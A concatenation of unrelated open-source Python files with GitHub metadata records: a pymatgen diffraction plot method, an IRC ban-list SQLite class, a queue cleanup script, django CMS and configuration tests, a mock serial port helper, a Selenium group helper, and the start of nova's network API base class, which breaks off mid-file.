ys.append(dot.position[1])
hkls.append(str(dot.hkl))
intensities.append(dot.intensity)
hkls = list(map(unicodeify_spacegroup, list(map(latexify_spacegroup, hkls))))
data = [
go.Scatter(
x=xs,
y=ys,
text=hkls,
hoverinfo="text",
mode="markers",
marker=dict(
size=8,
cmax=1,
cmin=0,
color=intensities,
colorscale=[[0, "black"], [1.0, "white"]],
),
showlegend=False,
),
go.Scatter(
x=[0],
y=[0],
text="(0, 0, 0): Direct beam",
hoverinfo="text",
mode="markers",
marker=dict(size=14, cmax=1, cmin=0, color="white"),
showlegend=False,
),
]
layout = go.Layout(
title="2D Diffraction Pattern<br>Beam Direction: " + "".join(str(e) for e in self.beam_direction),
font=dict(size=14, color="#7f7f7f"),
hovermode="closest",
xaxis=dict(
range=[-4, 4],
showgrid=False,
zeroline=False,
showline=False,
ticks="",
showticklabels=False,
),
yaxis=dict(
range=[-4, 4],
showgrid=False,
zeroline=False,
showline=False,
ticks="",
showticklabels=False,
),
width=550,
height=550,
paper_bgcolor="rgba(100,110,110,0.5)",
plot_bgcolor="black",
)
fig = go.Figure(data=data, layout=layout)
return fig
def get_plot_2d_concise(self, structure: Structure) -> go.Figure:
"""
Generates the concise 2D diffraction pattern of the input structure of a smaller size and without layout.
Does not display.
Args:
structure (Structure): The input structure.
Returns:
Figure
"""
if self.symprec:
finder = SpacegroupAnalyzer(structure, symprec=self.symprec)
structure = finder.get_refined_structure()
points = self.generate_points(-10, 11)
tem_dots = self.tem_dots(structure, points)
xs = []
ys = []
hkls = []
intensities = []
for dot in tem_dots:
if dot.hkl != (0, 0, 0):
xs.append(dot.position[0])
ys.append(dot.position[1])
hkls.append(dot.hkl)
intensities.append(dot.intensity)
data = [
go.Scatter(
x=xs,
y=ys,
text=hkls,
mode="markers",
hoverinfo="skip",
marker=dict(
size=4,
cmax=1,
cmin=0,
color=intensities,
colorscale=[[0, "black"], [1.0, "white"]],
),
showlegend=False,
)
]
layout = go.Layout(
xaxis=dict(
range=[-4, 4],
showgrid=False,
zeroline=False,
showline=False,
ticks="",
showticklabels=False,
),
yaxis=dict(
range=[-4, 4],
showgrid=False,
zeroline=False,
showline=False,
ticks="",
showticklabels=False,
),
plot_bgcolor="black",
margin={"l": 0, "r": 0, "t": 0, "b": 0},
width=121,
height=121,
)
fig = go.Figure(data=data, layout=layout)
fig.layout.update(showlegend=False)
return fig
| {
"content_hash": "018447ddfd4a7df6ccabac32cc7a0969",
"timestamp": "",
"source": "github",
"line_count": 660,
"max_line_length": 119,
"avg_line_length": 40.722727272727276,
"alnum_prop": 0.555307511999107,
"repo_name": "gmatteo/pymatgen",
"id": "901a0acd84727cba89a4c846ed8cedc4539daf34",
"size": "27053",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pymatgen/analysis/diffraction/tem.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "277"
},
{
"name": "Python",
"bytes": "7840569"
},
{
"name": "Shell",
"bytes": "711"
}
],
"symlink_target": ""
} |
import sqlite3
import re
from cStringIO import StringIO
ALLOWEDCHARS = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}'
ALLOWEDCHARS_IDENT = ALLOWEDCHARS+"~"
ALLOWEDCHARS_HOST = ALLOWEDCHARS + ":."
class InvalidCharacterUsed(Exception):
def __init__(self, string, char, pos):
self.string = string
self.char = char
self.pos = pos
def __str__(self):
hex_char = hex(ord(self.char))
return "String contains invalid character {0} on position {1}".format(hex_char, self.pos)
class NoSuchBanGroup(Exception):
def __init__(self, group_name):
self.group = group_name
def __str__(self):
return "No such ban group exists: '{0}'".format(self.group)
class BanList:
def __init__(self, filename):
self.ESCAPESTRING = "/"
self.ESCAPE = "[]"
self.NOT_ESCAPE = "*?!^"
self.conn = sqlite3.connect(filename)
self.cursor = self.conn.cursor()
# Create table for bans
self.cursor.execute("""
CREATE TABLE IF NOT EXISTS Banlist(groupName TEXT, pattern TEXT,
ban_reason TEXT,
timestamp INTEGER, banlength INTEGER
)
""")
# Create table for the names of the ban groups.
# This will be used to check if a group exists
# when checking if a user is banned in that group.
self.cursor.execute("""
CREATE TABLE IF NOT EXISTS Bangroups(groupName TEXT)
""")
self.defineGroup("Global")
# You need to define a group name if you want
# to have your own ban groups.
# This should prevent accidents in which an user
# is banned in a group that doesn't exist.
def defineGroup(self, groupName):
doesExist = self.__groupExists__(groupName)
if not doesExist:
self.cursor.execute("""
INSERT INTO Bangroups(groupName)
VALUES (?)
""", (groupName, ) )
self.conn.commit()
# True means that a new group has been defined.
return True
# False means that no new group has been defined, i.e.
# the group already exists.
return False
def banUser(self, user, ident="*", host="*", groupName="Global",
ban_reason="None",
timestamp=(-1), banlength=(-1)):
banstring = self.__assembleBanstring__(user, ident, host).lower()
if not self.__groupExists__(groupName):
raise NoSuchBanGroup(groupName)
if not self.__banExists__(groupName, banstring):
self.__ban__(banstring, groupName, ban_reason, timestamp, banlength)
# The operation was successful, we banned the pattern.
return True
else:
# We did not ban the pattern because it was already banned.
return False
def unbanUser(self, user, ident="*", host="*",
groupName="Global"):
banstring = self.__assembleBanstring__(user, ident, host).lower()
if not self.__groupExists__(groupName):
raise NoSuchBanGroup(groupName)
if self.__banExists__(groupName, banstring):
self.__unban__(banstring, groupName)
# The operation was successful, the pattern was unbanned.
return True
else:
# We did not unban the pattern because it was never banned in the first place.
return False
def clearBanlist_all(self):
self.cursor.execute("""
DELETE FROM Banlist
""")
self.conn.commit()
def clearBanlist_group(self, groupName):
self.cursor.execute("""
DELETE FROM Banlist
WHERE groupName = ?
""", (groupName, ) )
self.conn.commit()
def getBans(self, groupName=None, matchingString=None):
if groupName is None:
if matchingString is None:
self.cursor.execute("""
SELECT * FROM Banlist
""")
else:
self.cursor.execute("""
SELECT * FROM Banlist
WHERE ? GLOB pattern
""", (matchingString.lower(), ))
return self.cursor.fetchall()
else:
if self.__groupExists__(groupName):
if matchingString is None:
self.cursor.execute("""
SELECT * FROM Banlist
WHERE groupName = ?
""", (groupName, ))
else:
self.cursor.execute("""
SELECT * FROM Banlist
WHERE groupName = ? AND ? GLOB pattern
""", (groupName, matchingString.lower()))
return self.cursor.fetchall()
else:
raise NoSuchBanGroup(groupName)
def checkBan(self, user, ident, host,
groupName="Global"):
if not self.__groupExists__(groupName):
raise NoSuchBanGroup(groupName)
else:
banstring = u"{0}!{1}@{2}".format(user, ident, host).lower()
self.cursor.execute("""
SELECT * FROM Banlist
WHERE groupName = ? AND ? GLOB pattern
""", (groupName, banstring))#, self.ESCAPESTRING))
result = self.cursor.fetchone()
if result != None:
return True, result
else:
return False, None
def getGroups(self):
self.cursor.execute("""
SELECT groupName FROM Bangroups
""")
groupTuples = self.cursor.fetchall()
return [groupTuple[0] for groupTuple in groupTuples]
def raw_ban(self, banstring, groupName, ban_reason, timestamp=(-1), banlength=(-1)):
self.__ban__(banstring, groupName, ban_reason, timestamp, banlength)
def raw_unban(self, banstring, groupName):
self.__unban__(banstring, groupName)
# We do the reverse of what __createString_forSQL__ is doing.
# The result is a string which should be correct for using the
# banUser and unbanUser methods, and the ban/unban commands.
def unescape_banstring(self, banstring):
finstring = StringIO()
length = len(banstring)
string_iter = enumerate(banstring)
for pos, char in string_iter:
charsLeft = length - pos - 1
if char == "[" and charsLeft >= 3:
nextchar = banstring[pos+1]
closedBracket = banstring[pos+2]
if closedBracket == "]":
finstring.write(nextchar)
string_iter.next()
string_iter.next()
continue
if char in self.ESCAPE:
finstring.write(self.ESCAPESTRING+char)
continue
finstring.write(char)
return finstring.getvalue()
def __regex_return_unescaped__(self, match):
pass
def __ban__(self, banstring, groupName="Global", ban_reason="None", timestamp=(-1), banlength=(-1)):
self.cursor.execute("""
INSERT INTO Banlist(groupName, pattern, ban_reason, timestamp, banlength)
VALUES (?, ?, ?, ?, ?)
""", (groupName, banstring, ban_reason, timestamp, banlength))
self.conn.commit()
def __unban__(self, banstring, groupName = "Global"):
self.cursor.execute("""
DELETE FROM Banlist
WHERE groupName = ? AND pattern = ?
""", (groupName, banstring))
self.conn.commit()
def __banExists__(self, groupName, banstring):
self.cursor.execute("""
SELECT 1 FROM Banlist
WHERE groupName = ? AND pattern = ?
""", (groupName, banstring) )
result = self.cursor.fetchone()
print result, type(result)
if result != None and result[0] == 1:
return True
else:
return False
def __groupExists__(self, groupName):
self.cursor.execute("""
SELECT 1 FROM Bangroups
WHERE groupName = ?
""", (groupName, ) )
result = self.cursor.fetchone()
print result, type(result)
if result != None and result[0] == 1:
return True
else:
return False
def __stringIsValid__(self, string):
for char in string:
if char not in ALLOWEDCHARS:
return False
return True
def __assembleBanstring__(self, user, ident, host):
escapedUser = self.__createString_forSQL__(user)
escapedIdent = self.__createString_forSQL__(ident, ident = True)
escapedHost = self.__createString_forSQL__(host, hostname = True)
banstring = u"{0}!{1}@{2}".format(escapedUser, escapedIdent, escapedHost)
return banstring
# The createString_forSQL function takes a string and
# formats it according to specific rules.
# It also prevents characters that aren't in
# the ALLOWEDCHARS constant to be used so that
# characters not allowed in specific IRC arguments
# (nickname, ident, host) appear in the string.
#
# It is not very specific and is only useful for
# very simple filtering so that unicode characters
# or special characters aren't used.
def __createString_forSQL__(self, string, hostname = False, ident = False):
newString = StringIO()
# Both flags should not be set at once.
assert not ( (hostname == True) and (ident == True) )
for pos, char in enumerate(string):
# We try reverse-escaping:
# - escaped chars will be written as literals
# - non-escaped chars included in the escape string will be escaped
# pos == 0 is an exception because characters at this
# position cannot be escaped in any way that makes sense.
if char == self.ESCAPESTRING:
continue
if char in self.NOT_ESCAPE:
newString.write(char)
elif pos > 0 and string[pos-1] == self.ESCAPESTRING and char in self.ESCAPE:
newString.write(char)
elif char in self.ESCAPE:
#newString.write(self.ESCAPESTRING+char)
newString.write("["+char+"]")
else:
if (
(not hostname and not ident and char not in ALLOWEDCHARS)
or (hostname and char not in ALLOWEDCHARS_HOST)
or (ident and char not in ALLOWEDCHARS_IDENT)
):
raise InvalidCharacterUsed(string, char, pos)
else:
newString.write(char)
return newString.getvalue()
| {
"content_hash": "0fb53d47c53bbb57d282375e945338a6",
"timestamp": "",
"source": "github",
"line_count": 323,
"max_line_length": 104,
"avg_line_length": 37.73065015479876,
"alnum_prop": 0.49421514728809385,
"repo_name": "RenolY2/Renol-IRC",
"id": "8b9bf8f1d03c8a8ce27d0693890defe944c4fc0f",
"size": "12187",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "BanList.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "201288"
}
],
"symlink_target": ""
} |
import posix_ipc
import utils
try:
posix_ipc.unlink_message_queue(utils.QUEUE_NAME)
s = "message queue %s removed" % utils.QUEUE_NAME
print (s)
except:
print ("queue doesn't need cleanup")
print ("\nAll clean!")
| {
"content_hash": "d1fd7b85d0e36360d62ad1860f60b875",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 53,
"avg_line_length": 18.153846153846153,
"alnum_prop": 0.6610169491525424,
"repo_name": "overcastcloud/posix_ipc",
"id": "53ada4220572bbbc9b79db9f7dfb524f3c57b563",
"size": "236",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "demo3/cleanup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "118702"
},
{
"name": "HTML",
"bytes": "52082"
},
{
"name": "Python",
"bytes": "98714"
},
{
"name": "Shell",
"bytes": "358"
}
],
"symlink_target": ""
} |
from __future__ import with_statement
import json
from cms.api import add_plugin
from cms.constants import PLUGIN_MOVE_ACTION, PLUGIN_COPY_ACTION
from cms.models import StaticPlaceholder, Placeholder, CMSPlugin
from cms.tests.plugins import PluginsTestBaseCase
from cms.utils.compat.dj import force_unicode
from cms.utils.urlutils import admin_reverse
from django.contrib.admin.sites import site
from django.core.urlresolvers import reverse
from django.template import Context
from django.template.base import Template
URL_CMS_MOVE_PLUGIN = u'/en/admin/cms/page/%d/move-plugin/'
class StaticPlaceholderTestCase(PluginsTestBaseCase):
@property
def admin_class(self):
return site._registry[StaticPlaceholder]
def fill_placeholder(self, placeholder=None):
if placeholder is None:
placeholder = Placeholder(slot=u"some_slot")
placeholder.save() # a good idea, if not strictly necessary
# plugin in placeholder
plugin_1 = add_plugin(placeholder, u"TextPlugin", u"en",
body=u"01",
)
plugin_1.save()
# IMPORTANT: plugins must be reloaded, before they can be assigned
# as a parent. Otherwise, the MPTT structure doesn't seem to rebuild
# properly.
# child of plugin_1
plugin_2 = add_plugin(placeholder, u"TextPlugin", u"en",
body=u"02",
)
plugin_1 = self.reload(plugin_1)
plugin_2.parent = plugin_1
plugin_2.save()
return placeholder
def get_admin(self):
usr = self._create_user("admin", True, True)
return usr
def test_template_creation(self):
self.assertObjectDoesNotExist(StaticPlaceholder.objects.all(), code='foobar')
self.assertObjectDoesNotExist(Placeholder.objects.all(), slot='foobar')
t = Template('{% load cms_tags %}{% static_placeholder "foobar" %}')
t.render(self.get_context('/'))
self.assertObjectExist(StaticPlaceholder.objects.all(), code='foobar',
creation_method=StaticPlaceholder.CREATION_BY_TEMPLATE)
self.assertEqual(Placeholder.objects.filter(slot='foobar').count(), 2)
def test_empty(self):
self.assertObjectDoesNotExist(StaticPlaceholder.objects.all(), code='foobar')
self.assertObjectDoesNotExist(Placeholder.objects.all(), slot='foobar')
t = Template('{% load cms_tags %}{% static_placeholder "foobar" or %}No Content{% endstatic_placeholder %}')
rendered = t.render(self.get_context('/'))
self.assertIn("No Content", rendered)
t = Template('{% load cms_tags %}{% static_placeholder "" %}')
rendered = t.render(self.get_context('/'))
self.assertEqual("", rendered)
t = Template('{% load cms_tags %}{% static_placeholder code or %}No Content{% endstatic_placeholder %}')
rendered = t.render(Context({'code': StaticPlaceholder.objects.all()[0]}))
self.assertIn("No Content", rendered)
for p in Placeholder.objects.all():
add_plugin(p, 'TextPlugin', 'en', body='test')
t = Template('{% load cms_tags %}{% static_placeholder "foobar" or %}No Content{% endstatic_placeholder %}')
rendered = t.render(self.get_context('/'))
self.assertNotIn("No Content", rendered)
self.assertEqual(StaticPlaceholder.objects.filter(site_id__isnull=True, code='foobar').count(), 1)
def test_local(self):
self.assertObjectDoesNotExist(StaticPlaceholder.objects.all(), code='foobar')
self.assertObjectDoesNotExist(Placeholder.objects.all(), slot='foobar')
t = Template('{% load cms_tags %}{% static_placeholder "foobar" site or %}No Content{% endstatic_placeholder %}')
rendered = t.render(self.get_context('/'))
self.assertIn("No Content", rendered)
for p in Placeholder.objects.all():
add_plugin(p, 'TextPlugin', 'en', body='test')
rendered = t.render(self.get_context('/'))
self.assertNotIn("No Content", rendered)
self.assertEqual(StaticPlaceholder.objects.filter(site_id__isnull=False, code='foobar').count(), 1)
def test_publish_stack(self):
static_placeholder = StaticPlaceholder.objects.create(name='foo', code='bar', site_id=1)
self.fill_placeholder(static_placeholder.draft)
static_placeholder.dirty = True
static_placeholder.save()
self.assertEqual(static_placeholder.draft.cmsplugin_set.all().count(), 2)
self.assertEqual(static_placeholder.public.cmsplugin_set.all().count(), 0)
with self.login_user_context(self.get_superuser()):
response = self.client.get(reverse("admin:cms_page_publish_page", args=[1, 'en']), {'statics':[static_placeholder.pk]})
self.assertEqual(response.status_code, 302)
def test_permissions(self):
static_placeholder = StaticPlaceholder.objects.create(name='foo', code='bar', site_id=1)
request = self.get_request()
request.user = self._create_user('user_a', is_staff=True, is_superuser=False, permissions=['change_staticplaceholder'])
self.assertTrue( static_placeholder.has_change_permission(request) )
self.assertFalse( static_placeholder.has_publish_permission(request) )
request.user = self._create_user('user_b', is_staff=True, is_superuser=False, permissions=['change_staticplaceholder', 'publish_page'])
self.assertTrue( static_placeholder.has_change_permission(request) )
self.assertTrue( static_placeholder.has_publish_permission(request) )
request.user = self.get_superuser()
self.assertTrue( static_placeholder.has_change_permission(request) )
self.assertTrue( static_placeholder.has_publish_permission(request) )
def test_move_plugin(self):
static_placeholder_source = StaticPlaceholder.objects.create(name='foobar', code='foobar', site_id=1)
static_placeholder_target = StaticPlaceholder.objects.create(name='foofoo', code='foofoo', site_id=1)
sourceplugin = add_plugin(static_placeholder_source.draft, 'TextPlugin', 'en', body='test')
plugin_class = sourceplugin.get_plugin_class_instance()
expected = {'reload': plugin_class.requires_reload(PLUGIN_MOVE_ACTION)}
admin = self.get_admin()
with self.login_user_context(admin):
request = self.get_request(post_data={'plugin_id': sourceplugin.pk,
'placeholder_id': static_placeholder_target.draft.id,
'plugin_parent': '', 'plugin_language': 'en'})
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content.decode('utf8')), expected)
source = StaticPlaceholder.objects.get(pk=static_placeholder_source.pk)
target = StaticPlaceholder.objects.get(pk=static_placeholder_target.pk)
self.assertTrue(source.dirty)
self.assertTrue(target.dirty)
def test_copy_plugin(self):
static_placeholder_source = StaticPlaceholder.objects.create(name='foobar', code='foobar', site_id=1)
static_placeholder_target = StaticPlaceholder.objects.create(name='foofoo', code='foofoo', site_id=1)
sourceplugin = add_plugin(static_placeholder_source.draft, 'TextPlugin', 'en', body='test source')
targetplugin = add_plugin(static_placeholder_target.draft, 'TextPlugin', 'en', body='test dest')
StaticPlaceholder.objects.filter(pk=static_placeholder_source.pk).update(dirty=False)
plugin_class = sourceplugin.get_plugin_class_instance()
admin = self.get_admin()
with self.login_user_context(admin):
request = self.get_request(post_data={
'source_language': 'en',
'source_placeholder_id': static_placeholder_source.draft.pk,
'source_plugin_id': sourceplugin.pk,
'target_language': 'en',
'target_placeholder_id': static_placeholder_target.draft.pk,
'targetplugin_id': targetplugin.pk,
})
response = self.admin_class.copy_plugins(request)
# generate the expected response
plugin_list = CMSPlugin.objects.filter(
language='en', placeholder_id=static_placeholder_target.draft.pk).order_by(
'depth', 'position')
reduced_list = []
for plugin in plugin_list:
reduced_list.append(
{
'id': plugin.pk, 'type': plugin.plugin_type, 'parent': plugin.parent_id,
'position': plugin.position, 'desc': force_unicode(plugin.get_short_description()),
'language': plugin.language, 'placeholder_id': static_placeholder_target.draft.pk
}
)
expected = json.loads(
json.dumps({'plugin_list': reduced_list, 'reload': plugin_class.requires_reload(PLUGIN_COPY_ACTION)}))
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content.decode('utf8')), expected)
# Check dirty bit
source = StaticPlaceholder.objects.get(pk=static_placeholder_source.pk)
target = StaticPlaceholder.objects.get(pk=static_placeholder_target.pk)
self.assertFalse(source.dirty)
self.assertTrue(target.dirty)
def test_create_by_admin(self):
url = admin_reverse("cms_staticplaceholder_add")
with self.login_user_context(self.get_superuser()):
response = self.client.post(url, data={'name': 'Name', 'code': 'content'})
self.assertEqual(response.status_code, 302)
| {
"content_hash": "351d856c099132be9895de6ee1b2e48c",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 143,
"avg_line_length": 51.104166666666664,
"alnum_prop": 0.647778230737872,
"repo_name": "samirasnoun/django_cms_gallery_image",
"id": "6e0bfc58d71864a734eb11c71e81206376b43798",
"size": "9836",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "cms/tests/static_placeholder.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "245718"
},
{
"name": "JavaScript",
"bytes": "1060264"
},
{
"name": "Makefile",
"bytes": "2973"
},
{
"name": "PHP",
"bytes": "2274"
},
{
"name": "Python",
"bytes": "3309714"
},
{
"name": "Ruby",
"bytes": "1980"
},
{
"name": "XSLT",
"bytes": "10244"
}
],
"symlink_target": ""
} |
from functools import wraps
from itertools import islice
from nose.tools import assert_false
from nose.tools import assert_in
from nose.tools import eq_
from nose.tools import ok_
def _mock_method(function):
function_name = function.func_name
@wraps(function)
def decorator(self, *args, **kwargs):
self._method_calls.append((function_name, args, kwargs))
result = function(self, *args, **kwargs)
return result
return decorator
class MockSerialPort(object):
def __init__(self, writer=None, reader=None):
self._method_calls = []
self._data_writer = writer or MockSerialPortDataWriter()
self._data_reader = reader or MockSerialPortDataReader()
def clear_data(self):
self._data_writer.data_written = ""
self._data_reader.data_read = ""
def assert_method_was_called(self, method_name, *args, **kwargs):
method_calls = \
[call[1:] for call in self._method_calls if call[0] == method_name]
ok_(
method_calls,
"Method {!r} was not called".format(method_name),
)
wrong_arguments_message = \
"Method {!r} was not called with the expected arguments: " \
"Expected: {}".format(
method_name,
(args, kwargs),
)
assert_in(
(args, kwargs),
method_calls,
wrong_arguments_message,
)
def assert_data_was_written(self, expected_data):
if not expected_data.endswith("\n\r"):
expected_data += "\n\r"
actual_data = self._data_writer.data_written
eq_(
expected_data,
actual_data,
"Data {!r} was not written to the port, found {!r}".format(
expected_data,
actual_data,
),
)
def assert_no_data_was_written(self):
actual_data = self._data_writer.data_written
assert_false(
actual_data,
"No data was expected, found {!r}".format(actual_data),
)
def assert_data_was_read(self, data):
if not data.endswith(">"):
data += ">"
eq_(
data,
self._data_reader.data_read,
"Data {!r} was not read from the port".format(data),
)
def assert_scenario(self, *calls):
for expected_call, actual_call in zip(calls, self._method_calls):
expected_method_name, expected_args, expected_kwargs = expected_call
actual_method_name, actual_args, actual_kwargs = actual_call
eq_(
expected_method_name,
actual_method_name,
"Expected call to {!r} found {!r}".format(
expected_method_name,
actual_method_name,
)
)
eq_(
expected_args,
actual_args,
"In call to {!r} expected args {!r} found {!r}".format(
expected_method_name,
expected_args,
actual_args,
)
)
eq_(
expected_args,
actual_args,
"In call to {!r} expected kwargs {!r} found {!r}".format(
expected_method_name,
expected_kwargs,
actual_kwargs,
)
)
@_mock_method
def read(self, size=1):
return self._data_reader.read(size)
@_mock_method
def write(self, data):
self._data_writer.write(data)
@_mock_method
def flushOutput(self):
pass
@_mock_method
def flushInput(self):
pass
@_mock_method
def close(self):
pass
class MockSerialPortDataWriter(object):
def __init__(self):
self.data_written = ""
def write(self, data):
self.data_written += data
class MockSerialPortDataReader(object):
def __init__(self, data=None):
self.data_read = ""
self._expected_data = None
self._set_expected_data(data or "")
def read(self, size):
chunk = "".join(islice(self._expected_data, size))
self.data_read += chunk
return chunk
def _set_expected_data(self, data):
if ">" not in data:
data += ">"
self._expected_data = iter(data)
self.data_read = ""
| {
"content_hash": "baf1812605d94168281e28ab68c6692b",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 80,
"avg_line_length": 27.162650602409638,
"alnum_prop": 0.5169660678642715,
"repo_name": "franciscoruiz/python-elm",
"id": "20d1e922e91a2038b653119f0d35b6d62b940f95",
"size": "4509",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31761"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, unicode_literals
from django.test import TestCase
from django.db import IntegrityError
# from . import factory
from ..models import Configuration
import logging
import hashlib
import datetime
from . import factory
LOG = logging.getLogger(__name__)
class ConfigurationTest(TestCase):
def setUp(self):
self.conf_model = factory.ConfigurationFactory()
def test_get_empty_list(self):
"""
Tests get empty list when variable name does not exists
"""
self.assertEquals(Configuration.get_by_name_as_list("abc"), [])
def test_get_conf_by_name_all_fields(self):
"""
Tests get conf by name with all fields method
"""
conf_name = "newcfg"
Configuration(
name=conf_name,
value="1",
description="test"
).save()
self.assertEquals(
Configuration.get_by_name_all_fields(conf_name).value, "1")
def test_validate_hash(self):
conf = self.conf_model
to_hash = "%s%s%s%s" % (
conf.name,
conf.value,
conf.description,
datetime.date.strftime(datetime.date.today(), "%d%m%Y")
)
hash = hashlib.sha256(to_hash.encode("utf8")).hexdigest()
self.assertEquals(conf.hash, hash)
def test_get_cache_key(self):
conf = self.conf_model
k = "cfg:%s" % conf.name
self.assertEquals(conf.get_cache_key(conf.name), k)
def test_get_by_name_as_int(self):
conf_name = "new_conf_as_int"
Configuration(
name=conf_name,
value="1",
description="test"
).save()
get_conf = Configuration.get_by_name_as_int(conf_name)
self.assertIsInstance(get_conf, int)
self.assertEquals(get_conf, 1)
def test_get_by_name_as_float(self):
conf_name = "new_conf_as_float"
Configuration(
name=conf_name,
value="1.4",
description="test"
).save()
get_conf = Configuration.get_by_name_as_float(conf_name)
self.assertIsInstance(get_conf, float)
self.assertEquals(get_conf, 1.4)
def test_get_by_name(self):
conf = self.conf_model
get_conf = Configuration.get_by_name(conf.name)
self.assertEquals(get_conf, conf.value)
| {
"content_hash": "2bc189f423a7d979a7c68f90e8d96d06",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 71,
"avg_line_length": 28.321428571428573,
"alnum_prop": 0.5910046237915091,
"repo_name": "globocom/database-as-a-service",
"id": "81ae29e434d8b941dafd673450684c96cbc6fb39",
"size": "2403",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dbaas/system/tests/test_configuration.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "243568"
},
{
"name": "Dockerfile",
"bytes": "1372"
},
{
"name": "HTML",
"bytes": "310401"
},
{
"name": "JavaScript",
"bytes": "988830"
},
{
"name": "Makefile",
"bytes": "5199"
},
{
"name": "Python",
"bytes": "9674426"
},
{
"name": "Shell",
"bytes": "215115"
}
],
"symlink_target": ""
} |
class GroupHelper:
def __init__(self, app):
self.app = app
def open_groups_page(self):
driver = self.app.driver
# open groups page
driver.find_element_by_link_text("groups").click()
def create(self, group):
driver = self.app.driver
# open groups page
self.open_groups_page()
# create new group
driver.find_element_by_name("new").click()
driver.find_element_by_name("group_name").click()
driver.find_element_by_name("group_name").clear()
driver.find_element_by_name("group_name").send_keys(group.name)
driver.find_element_by_name("group_header").click()
driver.find_element_by_name("group_header").clear()
driver.find_element_by_name("group_header").send_keys(group.header)
driver.find_element_by_name("group_footer").click()
driver.find_element_by_name("group_footer").clear()
driver.find_element_by_name("group_footer").send_keys(group.footer)
driver.find_element_by_name("submit").click()
self.return_to_groups_page()
def delete_first_group(self):
driver = self.app.driver
# open groups page
self.open_groups_page()
driver.find_element_by_name("selected[]").click()
driver.find_element_by_name("delete").click()
self.return_to_groups_page()
def return_to_groups_page(self):
driver = self.app.driver
# returns to groups page
driver.find_element_by_link_text("groups").click() | {
"content_hash": "5ae446d0c7c36e133700de858620b11e",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 75,
"avg_line_length": 36.833333333333336,
"alnum_prop": 0.616677440206852,
"repo_name": "Antikiy/python_training",
"id": "cbf82ccb51e3075bab10d14a6c3b105908ad3722",
"size": "1548",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fixture/group.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3952"
}
],
"symlink_target": ""
} |
import functools
import inspect
from nova.db import base
from nova import hooks
from nova.i18n import _
from nova.network import model as network_model
from nova import objects
from nova.openstack.common import excutils
from nova.openstack.common import lockutils
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
@hooks.add_hook('instance_network_info')
def update_instance_cache_with_nw_info(impl, context, instance,
nw_info=None, update_cells=True):
try:
if not isinstance(nw_info, network_model.NetworkInfo):
nw_info = None
if nw_info is None:
nw_info = impl._get_instance_nw_info(context, instance)
LOG.debug('Updating cache with info: %s', nw_info)
# NOTE(comstud): The save() method actually handles updating or
# creating the instance. We don't need to retrieve the object
# from the DB first.
ic = objects.InstanceInfoCache.new(context, instance['uuid'])
ic.network_info = nw_info
ic.save(update_cells=update_cells)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_('Failed storing info cache'), instance=instance)
def refresh_cache(f):
"""Decorator to update the instance_info_cache
Requires context and instance as function args
"""
argspec = inspect.getargspec(f)
@functools.wraps(f)
def wrapper(self, context, *args, **kwargs):
res = f(self, context, *args, **kwargs)
try:
# get the instance from arguments (or raise ValueError)
instance = kwargs.get('instance')
if not instance:
instance = args[argspec.args.index('instance') - 2]
except ValueError:
msg = _('instance is a required argument to use @refresh_cache')
raise Exception(msg)
with lockutils.lock('refresh_cache-%s' % instance['uuid']):
update_instance_cache_with_nw_info(self, context, instance,
nw_info=res)
# return the original function's return value
return res
return wrapper
SENTINEL = object()
class NetworkAPI(base.Base):
"""Base Network API for doing networking operations.
New operations available on specific clients must be added here as well.
"""
def __init__(self, **kwargs):
super(NetworkAPI, self).__init__(**kwargs)
def get_all(self, context):
"""Get all the networks for client."""
raise NotImplementedError()
def get(self, context, network_uuid):
"""Get specific network for client."""
raise NotImplementedError()
def create(self, context, **kwargs):
"""Create a network."""
raise NotImplementedError()
def delete(self, context, network_uuid):
"""Delete a specific network."""
raise NotImplementedError()
def disassociate(self, context, network_uuid):
"""Disassociate a network for client."""
raise NotImplementedError()
def get_fixed_ip(self, context, id):
"""Get fixed ip by id."""
raise NotImplementedError()
def get_fixed_ip_by_address(self, context, address):
"""Get fixed ip by address."""
raise NotImplementedError()
def get_floating_ip(self, context, id):
"""Get floating ip by id."""
raise NotImplementedError()
def get_floating_ip_pools(self, context):
"""Get floating ip pools."""
raise NotImplementedError()
def get_floating_ip_by_address(self, context, address):
"""Get floating ip by address."""
raise NotImplementedError()
def get_floating_ips_by_project(self, context):
"""Get floating ips by project."""
raise NotImplementedError()
def get_floating_ips_by_fixed_address(self, context, fixed_address):
"""Get floating ips by fixed address."""
raise NotImplementedError()
def get_instance_id_by_floating_address(self, context, address):
"""Get instance id by floating address."""
raise NotImplementedError()
def get_vifs_by_instance(self, context, instance):
"""Get vifs by instance."""
raise NotImplementedError()
def get_vif_by_mac_address(self, context, mac_address):
"""Get vif mac address."""
raise NotImplementedError()
def allocate_floating_ip(self, context, pool=None):
"""Adds (allocate) floating ip to a project from a pool."""
raise NotImplementedError()
def release_floating_ip(self, context, address,
